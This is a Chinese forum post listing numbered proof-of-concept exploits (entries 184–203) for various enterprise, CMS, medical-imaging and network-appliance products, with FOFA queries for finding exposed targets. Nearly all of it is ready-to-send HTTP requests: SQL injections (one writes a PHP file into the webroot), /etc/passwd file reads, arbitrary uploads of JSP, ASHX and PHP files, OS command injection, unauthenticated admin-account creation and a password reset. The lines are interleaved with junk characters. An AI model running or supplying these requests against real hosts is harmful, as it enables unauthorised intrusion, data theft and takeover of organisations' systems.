User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.364 k3 S  g' \3 y& ^; s( m
Accept-Charset: utf-84 B; i$ J# i/ c4 u% y
Accept-Encoding: gzip, deflate0 A4 k  u2 L) j+ x
Connection: close2 r3 {2 a5 s% B1 q

2 J/ x% Y( B/ n, A' I$ c. j+ B$ W, J* F: Z+ |
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加/ m  r0 t9 L% Y/ ]- `' U0 _! E; [
FOFA:server="SunFull-Webs"7 g. K$ m9 p) F* S% p: x
POST /soap/AddUser HTTP/1.1
* L: k' m# I" HHost: your-ip
. [& l6 d9 @8 dAccept-Encoding: gzip, deflate
: {9 Y  c& d$ D$ Y& `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.00 i' d8 |7 r, ~! T
Accept: application/xml, text/xml, */*; q=0.01
/ y5 @+ ]1 B! Y+ \/ H3 iContent-Type: text/xml; charset=utf-8
/ \$ b' R) F. `6 g( [. g- H2 DAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 Z2 d* ]" A  y9 m! ]7 l
X-Requested-With: XMLHttpRequest
8 D7 Z' R/ @6 T* @
2 ?. K3 Q% B$ i2 b4 L$ M
  {3 L& s, n3 `+ u* l2 @% jinsert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')
  @$ d+ C& @" Z( P2 s# N- ]6 q2 J* `; P1 X* g! w- J
- K4 M) P7 `6 \% o8 c$ ^- o; V* k; {  S
185. 瑞友天翼应用虚拟化系统SQL注入
! e- q- E4 o+ F& @- i# E& yversion < 7.0.5.1! F" a% V6 g* K! G8 y
FOFA:app="REALOR-天翼应用虚拟化系统"! @  O6 n3 u6 H# R
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1+ }# [3 y8 k* K) ?  Y7 X' Q- ?
Host: host9 {2 P# }# A5 b4 S; W
4 _. t" q0 n! t

1 S% e9 [6 s0 m; O; O* ^186. F-logic DataCube3 SQL注入; ?  Q- Y1 K9 P
CVE-2024-31750
# B3 g0 ?- N3 L, ]: HF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
9 \6 t$ E0 L8 {4 w( l- aFOFA:title=="DataCube3"4 s. q4 S/ [6 L6 d( Q
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
' R- Y. z! a) P8 Z6 [0 ~Host: your-ip
1 r4 R& O3 J5 q5 a* Z2 GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
+ _* }' g: F6 S9 Z0 |% G  x3 c9 CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
$ p/ b. i# ~8 J4 H: i: M/ YAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' W. F8 x& C& J9 B9 BAccept-Encoding: gzip, deflate5 R( C$ {, x6 V* Y  |6 l; N0 Y
Connection: close6 h# R) ~) C. q; G
Content-Type: application/x-www-form-urlencoded
, _7 O1 n! N+ i3 i6 w7 u2 J0 {! H1 @7 u( G1 H, j/ D
req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
! V9 X! l& V0 W( r4 Y+ H% r/ l- v
0 e6 f$ ]9 v( V1 s0 ]) O3 V
3 i7 |# t6 s0 o% b* k" V/ Y187. Mura CMS processAsyncObject SQL注入
# ]2 D; i; b) K2 t! [0 x: K* FCVE-2024-32640
3 M4 C0 B1 K) J' jFOFA:"Mura CMS"
6 V' l; ~9 P% aPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1! E3 r% I% R3 c$ F0 H3 `0 o
Host: your-ip% v4 M; Q: O& ~( m9 q( O! ^
Content-Type: application/x-www-form-urlencoded
. y' L: y+ r. S8 ^2 U0 m, m4 n) w# C" d$ B% q: e" i/ @
; d2 E1 n( L6 I9 d- Z& z9 O
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
' `) J& y: E, r8 L+ ?. N9 i1 \+ K& P, f+ y* ~: [( l

- P% r+ u5 m) ~6 J188. 叁体-佳会视频会议 attachment 任意文件读取$ Q9 e& a2 a1 S) J1 B
version <= 3.9.70 o( ]# w0 s' I- k# F
FOFA:body="/system/get_rtc_user_defined_info?site_id"; Q9 d; i" E: E
GET /attachment?file=/etc/passwd HTTP/1.1- s* S; }% M4 Q5 C: o
Host: your-ip4 i  x7 z' {  z1 A9 |* k" R- a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36- k" O4 U+ W! k& {7 m
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.70 T( T8 T* @$ j4 y4 ^# s6 K8 A
Accept-Encoding: gzip, deflate
, z% ~, F: [  t) m- ?: e3 L1 _Accept-Language: zh-CN,zh;q=0.9,en;q=0.8- u) x- L" Q1 g% U2 W- i
Connection: close
& @7 i8 b/ l- k+ v( j; v$ m- U
! O, H& F+ t1 B( K. ]; Q3 z
2 ?) C/ z5 Y4 B( S189. 蓝网科技临床浏览系统 deleteStudy SQL注入, X5 `; _3 x" M6 g$ F& u9 |& J- ?/ D5 T
FOFA:app="LANWON-临床浏览系统"
( V" X1 ]4 |; Z5 s! p' u' PGET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1- g+ c3 a4 m) R& ^7 k: r& f  ?
Host: your-ip! U6 M/ H( j$ J2 J" g5 R  V
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
! h4 t$ P) @* j5 a1 zAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.71 r' ?6 U: c& U& P
Accept-Encoding: gzip, deflate- E: e% P7 I$ v8 y
Accept-Language: zh-CN,zh;q=0.92 O! j$ d# H+ ?2 H5 s/ m
Connection: close2 X- L! Z& x7 ]0 k+ s+ m

. s1 \4 P+ Z0 A( }
% N! U: p3 r$ w' u, a, B8 O190. 短视频矩阵营销系统 poihuoqu 任意文件读取# O2 w; d8 G$ i" n0 |9 X* g( T
FOFA:title=="短视频矩阵营销系统"
6 q( k/ x! b( o9 u8 N3 iPOST /index.php/admin/Userinfo/poihuoqu HTTP/2
) r. v4 t: C5 b7 [$ U; B* NHost: your-ip
! j0 H7 x  r  L6 \6 \" JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
6 T3 i$ s8 H5 a% L, @- `Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
3 u3 `! C4 P' S( r; wContent-Type: application/x-www-form-urlencoded
) y8 r0 m. P6 U  Q/ l9 P3 e* fAccept-Encoding: gzip, deflate; z1 M& o  O+ e7 a
Accept-Language: zh-CN,zh;q=0.9: G3 D* m# R  Y, s
( c, ]& Y3 z; D  j3 J
poi=file:///etc/passwd
" ]) r- k1 _/ T5 R! q6 P* |8 n
/ t3 R8 {. l3 m7 {$ X
( o2 F# K5 [4 N1 P/ V/ ^191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
% ]& f) v" @# M$ T8 tFOFA:body="/CDGServer3/index.jsp"
8 {- @" X' F. @2 _POST /CDGServer3/js/../NavigationAjax HTTP/1.15 g$ |; B) n2 _" L* L  x
Host: your-ip) o) T" S; V5 ~* B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.365 G0 w7 w/ d1 D/ A, J* A6 `
Content-Type: application/x-www-form-urlencoded$ ?& [/ w$ i3 i) w# R3 V

$ ~+ E4 L8 H6 d* qcommand=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
  P8 T8 T5 E( M4 M5 f
# K8 A+ O) `) t- @' |, q$ }; T1 f1 e3 \, t& j
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传( O8 [* T+ ~7 ]
FOFA:title="用户登录_富通天下外贸ERP"$ N! r4 V  n& ?: a$ A
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.11 E- K9 z% y- W( ~
Host: your-ip# C3 ~3 f, X* M5 R# [- m* l& g
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36; T" g; s. [+ g1 V
Content-Type: application/x-www-form-urlencoded
8 ~8 I/ i; _1 X6 c
, ?* {( T0 t3 A$ r' g0 R) G
  s  K7 c* A0 E. o; G5 m" j0 T<% @ webhandler language="C#" class="AverageHandler" %>
: r8 _( B; p& b  x4 e6 u* qusing System;
! r4 m7 d1 v0 ^& s7 x2 N/ X0 C2 Q/ Z8 Vusing System.Web;1 \/ O1 r( }/ |* g1 X/ }6 x$ ]
public class AverageHandler : IHttpHandler8 e, q$ V- J: E
{) @% a. U0 O( N! H
public bool IsReusable
2 e* H7 f2 ~5 `0 f5 D7 h{ get { return true; } }
; Z/ `' A; w' |0 z- d, P  w: e0 `2 \public void ProcessRequest(HttpContext ctx)# i. G) A8 z& v3 r
{" {7 D* b: S. `4 |" L
ctx.Response.Write("test");
3 m/ |) E* e& A+ T: x: v}- j  J+ i) f5 N/ _4 T. y: H( r
}
- h3 u$ g  D$ e4 k5 S' f! Z5 ~7 O  Q* A% ^. @1 m2 e, Y$ b

, p8 B# q! x; w7 ]0 ]193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
* b9 K1 x, L6 g+ \+ d& s( Q: UFOFA:body="山石云鉴主机安全管理系统"
" A1 ^5 K: a# S+ \5 LGET /master/ajaxActions/getTokenAction.php HTTP/1.1
* a. G" c+ f1 C* dHost:/ ]+ Q6 Z2 r0 @
Cookie: PHPSESSID=2333333333333;2 D1 d4 }9 e4 P: z
Content-Type: application/x-www-form-urlencoded
/ |+ b, B! c1 b- h: rUser-Agent: Mozilla/5.0
' t8 e9 S+ y& `/ j  l8 R) G; a1 i
! Z3 c, a0 A- Y
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
6 b: s* ~+ b5 H9 aHost:9 u& x! X$ m. e# U5 _
User-Agent: Mozilla/5.0
8 z. V8 Z$ a6 Y- x$ IAccept-Encoding: gzip, deflate
) |& z( V% v3 B- fAccept: */*7 _' a& w0 A- X
Connection: close. c* m$ \9 q2 m" d2 f
Cookie: PHPSESSID=2333333333333;3 d% N- \+ L4 _
Content-Type: application/x-www-form-urlencoded( d$ r; S7 _4 I% x# R
Content-Length: 84; D* A1 B. S: C& M' I# _1 O

3 B" y% O0 t4 S# ~3 ^1 dparam=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')1 c  G3 L. T; }" u/ j: |, Q; K

& ]. p6 J4 N( ^: V& P6 Z& r+ k
- T4 I! t: ^/ |3 `GET /master/img/config HTTP/1.1
! o) u3 o" Y% N1 m0 {Host:" q3 o" {# v0 O& N% D7 T
User-Agent: Mozilla/5.08 M# }6 U% N/ J% b

/ d# p# R5 U  h" L: J) v
/ U: R" ~2 N, e+ z" G6 T194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
2 B8 `# J& @3 B0 f4 f, j7 b* fFOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在' R, G+ \. M" d1 A( y. a
8 t/ `6 l5 X7 g/ V, |8 k* R5 d
POST /servlet/uploadAttachmentServlet HTTP/1.1. B$ Q  r; T7 K" y
Host: host! Y% x5 b( v7 I7 W% l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36& g% M, B- N* L5 U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8. v5 t1 O. b6 j, z0 N
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 ^4 b7 |1 e( c: u
Accept-Encoding: gzip, deflate8 \% G, ~. K2 H( |# K- R- k; I- O
Connection: close
6 e% `' `% N- L  yContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk* G! R& [$ e5 i! g9 [$ L
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
) v5 e4 V& B. M' ^+ b8 o1 ~$ L9 i8 a" Y+ [: p
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"/ c% z( o6 ^4 w
Content-Type: text/plain6 f! {2 m4 D' D
<% out.println("hello");%>. K' r0 b: Q. S3 D2 a% G
------WebKitFormBoundaryKNt0t4vBe8cX9rZk- t1 o$ Z% J: R" G  V
Content-Disposition: form-data; name="json"
0 z& G" t* r' i' { {"iq":{"query":{"UpdateType":"mail"}}}9 ]' o+ b8 M0 v/ k5 y  {
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--1 W% w0 {0 ]6 _) p1 c
6 L! V& t1 f* Q, z2 a
4 o7 {- P; N" `5 k# T1 Y) i
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行1 S, ~0 i0 O; J
FOFA:title=="飞鱼星企业级智能上网行为管理系统+ l3 I. q1 O# V; G
POST /send_order.cgi?parameter=operation HTTP/1.1
( c! r/ s# N8 v# c* J* z" YHost: 127.0.0.1& J# W9 H# J; J1 d# z
Pragma: no-cache
$ c' P4 ~0 Y) O% Q3 Z- YCache-Control: no-cache( S. {4 C+ m% L+ z+ ~( R) \2 P( E8 J- M3 }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
' C* K9 G' Q3 y! R* x$ tAccept: */*
, S  b$ K3 N( q+ YAccept-Encoding: gzip, deflate
6 j; n& g, F# h3 X# FAccept-Language: zh-CN,zh;q=0.9( W3 p- Q0 r* y; j& g" V
Connection: close, Y  B9 s# H9 }7 v7 }& J( N% [$ y
Content-Type: application/x-www-form-urlencoded
& j$ ?4 N5 K  y0 _3 c! L+ H; u0 nContent-Length: 682 k) m0 d' y- O4 s) k

! Z: E. \$ x7 S! N; h{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}' V/ H9 u# ^5 X6 t
: O( W" N1 q( Z$ r

4 p3 Y+ P" E& W* q; z" x+ m+ o196. 河南省风速科技统一认证平台密码重置
" G' Y' Y0 W2 x+ ?" VFOFA:body="/cas/themes/zbvc/js/jquery.min.js"% w% F9 G( c) K
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1& B' S. `0 P1 _4 ~
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
% [7 m" f) w* G0 k3 YContent-Type: application/json;charset=UTF-8) E- t" O7 Q9 D. ^+ Z$ f. B
X-Requested-With: XMLHttpRequest
0 l* ~7 }. P( V+ i6 n3 ]Host:
! {- P$ J9 I: X4 t  C* p/ vAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
( {- C# [: Q& O. A9 eContent-Length: 45, T  Y% E* E, c+ L
Connection: close9 y7 s- @% z% i: J) y( b0 `

$ l- _! S6 y& e1 Z{"xgh":"test","newPass":"test666","email":""}: D$ q+ b: G7 a7 g

7 E0 q9 Z0 N7 i3 R
% ^! v: P3 i: P! W* K
+ E9 }, W, h8 F3 ]: @197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入# A7 m1 K% @7 A* z+ e+ Q
FOFA:app="浙大恩特客户资源管理系统"6 S" W8 K' \' ~) E, F; j5 G
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
8 c( B, `6 t. `. rHost:7 l' }- J, h3 H! U% u; _4 q7 C
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
* c" p$ U' ~" i7 V6 N* HAccept-Encoding: gzip, deflate
" `) p8 R9 @% mConnection: close- v; L9 O( F7 j

9 b' T3 y! c6 _5 U3 F' b
& n6 D" f; e$ y* Z
9 \2 D4 h1 R  j) E1 {4 L" |198.  阿里云盘 WebDAV 命令注入
8 {6 A1 r, [6 y8 ]+ r) ?6 x7 RCVE-2024-29640
3 n! U1 n  S, {8 pGET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1# H" Y+ D% I$ Q; h! B% k
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
, x% X( V2 w0 D; t+ J. M6 DAccept: */*
3 m1 a4 |3 `/ K5 T* a: y0 KAccept-Encoding: gzip, deflate, e7 c5 d. s' N, U! b& t! `0 [; h! g
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6: ]  r7 w$ |9 R: i  C' U
Connection: close0 T2 b  F$ q) B; o: C- |

/ b9 c3 T1 h0 P4 M: ~: V# P# j$ }. j6 U: |, b
199. cockpit系统assetsmanager_upload接口 文件上传
( [8 w# k4 \  f& {2 g6 ^6 H! E% B: E6 ~' @0 G
1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:; |6 G" b2 k5 f7 l/ r+ K' M
GET /auth/login?to=/ HTTP/1.1
5 i! k3 L/ z. f/ @# W
4 R1 l6 \/ E' M: J1 d响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
  `) c3 W* ]: F, r* {0 x6 K0 H# H9 d
/ t; R+ D$ Q( \( U( a2.使用刚才上一步获取到的jwt获取cookie:8 ]& o8 S3 E7 f' X
) x$ N' }9 N5 j9 {
POST /auth/check HTTP/1.15 x% ?1 Z3 d4 D* w% o+ K' H& y
Content-Type: application/json1 W/ d2 q) W& Y- t4 b7 r
3 i* c& c/ l0 i8 Z. K
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}
  e: Z9 n2 ]3 r
6 \- a3 U- Y  {; z$ t- {响应:200,返回值:7 T( }+ X+ }& u7 Y% e- {" J
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
1 ^* \7 G$ M) u) _2 ~8 j% P; hFofa:title="Authenticate Please!"
6 Z4 f7 \$ w+ L  E' G2 hPOST /assetsmanager/upload HTTP/1.1
6 O7 P) F/ r% X) gContent-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3+ t" {) |6 L/ y' _; Q
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92
& g: r2 }5 `7 S: z$ B$ x; M; z  ]( j6 ^; C
-----------------------------36D28FBc36bd6feE7Fb3  p# y, \9 G& y1 n6 X% L
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
$ L' Q1 K  }, B- Q* [( eContent-Type: text/php
5 y0 [! }& ]( v/ V
$ [$ p" i$ u. h& `6 ]8 [6 F% D& @# u<?php echo "tttt";unlink(__FILE__);?>
/ [9 h: }/ G4 y( y7 Q-----------------------------36D28FBc36bd6feE7Fb3( \0 B  U# Z* _) p( I
Content-Disposition: form-data; name="folder"( D( o% e0 u" c9 ?1 O0 S' u# J

" {; Y0 b9 _7 z+ B-----------------------------36D28FBc36bd6feE7Fb3--
; E6 ^4 x0 Q0 N8 @4 @: h
# c3 M/ v; ?0 n* Y! R
2 t2 H7 o% @% P  C! ]/storage/uploads/tttt.php5 q9 q* _8 I2 r

% C. x) r  w. A% J2 o2 @9 g9 t. @) ]200. SeaCMS海洋影视管理系统dmku SQL注入
# f& F; v$ ], U( |% ?1 PFOFA:app="海洋CMS"
3 V$ t, ?3 l! D, R8 IGET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1% l; _+ c* @/ W4 z& x
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s( M+ N- A) D- j/ C* K9 S" S6 F" a; s' o
Upgrade-Insecure-Requests: 1' i0 _( u3 W& }. [9 H* U% l
Cache-Control: max-age=0
0 Z  p" H! M3 |  KAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
. Z8 u/ K$ r# V/ L) ]- w- q1 zAccept-Encoding: gzip, deflate" A3 n3 q0 a. }3 B! u* g, }- I
Accept-Language: zh-CN,zh;q=0.9
% c) O3 ]9 I7 t9 k) I+ V' H7 w1 R& o; a" p. {5 M8 y* D
" l9 m% N! O; m0 z
201. 方正全媒体新闻采编系统 binary SQL注入
% O3 \* w6 y8 z7 f, \FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
3 X( N. ~/ P% yPOST /newsedit/newsplan/task/binary.do HTTP/1.1  k3 d5 f1 g( D. M( [- K
Content-Type: application/x-www-form-urlencoded1 U( R+ `' ~/ x% y* ^& y% G
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7! Z, u+ A7 b, C& G8 Y
Accept-Encoding: gzip, deflate
+ K( \) ~, {7 o( F1 Q4 ~: pAccept-Language: zh-CN,zh;q=0.9
( m' ]  F9 N7 F8 }: c3 `Connection: close# I% _6 h  p6 b

5 x" ^+ j. H% t: Z/ q3 Y9 ~& [TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
2 P4 P" O/ c& r6 L7 N/ S0 h4 R$ Y) @
$ x& I3 U8 E! W
202. 微擎系统 AccountEdit任意文件上传
- f+ `; B, G- {9 C9 v' G, LFOFA:body="/Widgets/WidgetCollection/"
! w: D  D$ \9 g3 `0 O5 P! U7 H获取__VIEWSTATE和__EVENTVALIDATION值
  s! {3 d+ k" q0 Z8 s) y3 C6 D4 O9 ^GET /User/AccountEdit.aspx HTTP/1.1
) `# u# ?7 U/ \& w: j' THost: 滑板人之家6 Q% l' [; L( n( z- G6 a/ V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
1 G. w" G% _! L5 YContent-Length: 0: y: @) c) n( w& E* v) Q
& ]2 b, Q! y4 U- [& V4 c  G/ J4 P% g8 X. P

) W% \* _; g5 k4 t9 @$ ]& K8 _替换__VIEWSTATE和__EVENTVALIDATION值
6 }5 m2 F, d. U4 g5 QPOST /User/AccountEdit.aspx HTTP/1.1
; u! p$ d" I6 D3 m: j# W9 D, gAccept-Encoding: gzip, deflate, br
( d1 f) j0 `& S. _6 w0 b9 ^* x9 fContent-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
. A: P- U9 c" x2 D
& o2 m' d; W! {. G/ U, L-----------------------------786435874t385875938657365873465673587356870 F* M7 c. Y* G
Content-Disposition: form-data; name="__VIEWSTATE": S! r9 O8 e$ ^$ p* p1 j) K
; ~! F" P0 c4 U: I  s$ M+ C. f! G
__VIEWSTATE' R& ^. p% E! X1 u! V0 y
-----------------------------786435874t38587593865736587346567358735687
& J( B0 k" d6 A6 HContent-Disposition: form-data; name="__EVENTVALIDATION"
; E4 x" |3 k. w5 O- l" K8 k  G) Z9 w# V# Q
__EVENTVALIDATION0 v% S3 O0 I+ `3 }- K. [
-----------------------------786435874t38587593865736587346567358735687' x; e% K$ e: q) J
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"- o0 d9 n: ?* I% }) B* [5 x
Content-Type: text/plain! F, M1 W9 ?* R/ p" a8 v

: L# K9 C" t# A+ ]' p6 X7 yHello World!
4 B0 v4 z2 r5 q  y-----------------------------786435874t385875938657365873465673587356876 }* S% D$ b) @- Q2 @
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
4 c+ \( Q" I8 }2 O2 a
- s. T1 ~: p' P/ i0 l# Z上传图片
4 S' [! I: Q* R* n-----------------------------786435874t38587593865736587346567358735687( y; x$ H9 t. @4 a3 n# |
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"3 x3 p' N. d9 G! X

/ Z) k8 X2 ~$ o  |
7 R8 \: k4 ]3 B3 Y) T$ i-----------------------------786435874t38587593865736587346567358735687
, P" M9 i# R' I9 q9 p' FContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"7 k+ y% u  s7 m) r% f
. @( ^% G. E7 Q% n2 N
6 R' a' H8 r1 w: E& C8 E' D
-----------------------------786435874t38587593865736587346567358735687--
) X$ i9 h+ V9 H# Y, P: P) Q# v$ g. P8 N* X3 j+ R

/ e0 G# ], w) L, A0 j/_data/Uploads/1123.txt
! M% y6 j% l1 O. ~4 i6 E( t- c- ~3 h5 G2 D. {
203. 红海云EHR PtFjk 文件上传
* R; C; j4 F3 M" u0 p8 w% I4 E4 EFOFA:body="RedseaPlatform"
- [" J8 ~  V/ j- x4 k. [/ V8 k% `POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.11 K5 L) ]& m* c3 D1 L
Host: x.x.x.x
9 r7 i& k8 M/ ?1 ?, C# P( E% M; `Accept-Encoding: gzip
9 |% Q4 J7 h+ l, }+ d+ lUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
) y; @3 l5 g  [5 s9 s1 HContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
3 p% m4 b/ e3 H& hContent-Length: 210
$ J+ _) O3 P7 F3 O
: I  _; r9 H: d: T7 o------WebKitFormBoundaryt7WbDl1tXogoZys40 f5 E- Y  z0 U4 H" e$ k
Content-Disposition: form-data; name="fj_file"; filename="11.jsp") n) `% {$ q# u
Content-Type:image/jpeg
" {% ?5 ?1 d4 a
  D3 @5 U1 M" o0 ?0 J3 P# z<% out.print("hello,eHR");%>
2 \/ N0 N# d  x------WebKitFormBoundaryt7WbDl1tXogoZys4--( r' a) r0 F8 W5 J

$ E5 G) d8 L1 ?: H
5 u; ]5 n" S# C: L  ^
& W+ v6 ]' {5 M+ P# x5 E' D# Y% i) [0 H  _, i7 x
1 [% x, I+ G! K* p

1 b# u- D9 t3 L4 {$ l, M
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表